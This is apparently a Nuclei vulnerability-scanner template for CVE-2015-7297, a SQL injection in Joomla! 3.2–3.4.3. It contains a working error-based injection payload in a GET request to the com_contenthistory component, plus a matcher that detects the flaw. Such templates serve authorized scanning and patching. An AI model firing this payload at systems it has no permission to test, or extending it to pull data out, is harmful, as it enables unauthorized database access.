id: CVE-2015-7297 info: name: Joomla! Core SQL Injection author: princechaddha severity: high description: A SQL injection vulnerability in Joomla! 3.2 before 3.4.4 allows remote attackers to execute arbitrary SQL commands. remediation: | Apply the latest security patches and updates provided by Joomla! to mitigate the SQL Injection vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2015-7297 - http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html - https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ - http://packetstormsecurity.com/files/134097/Joomla-3.44-SQL-Injection.html - http://packetstormsecurity.com/files/134494/Joomla-Content-History-SQL-Injection-Remote-Code-Execution.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2015-7297 cwe-id: CWE-89 epss-score: 0.97564 epss-percentile: 0.99998 cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla product: joomla\! tags: packetstorm,cve,cve2015,joomla,sqli variables: num: "999999999" http: - method: GET path: - "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)" matchers: - type: word part: body words: - '{{md5({{num}})}}' # digest: 4a0a004730450221009d673eae8916791f24d8046edd39a8ce0db2749c76db937501735c2ab612fd0902206d7d182a8282c138730f56b10c6b640243289a34f6082fa975fd2dde03ea8f5f:922c64590222798bb761d5b6d8e72950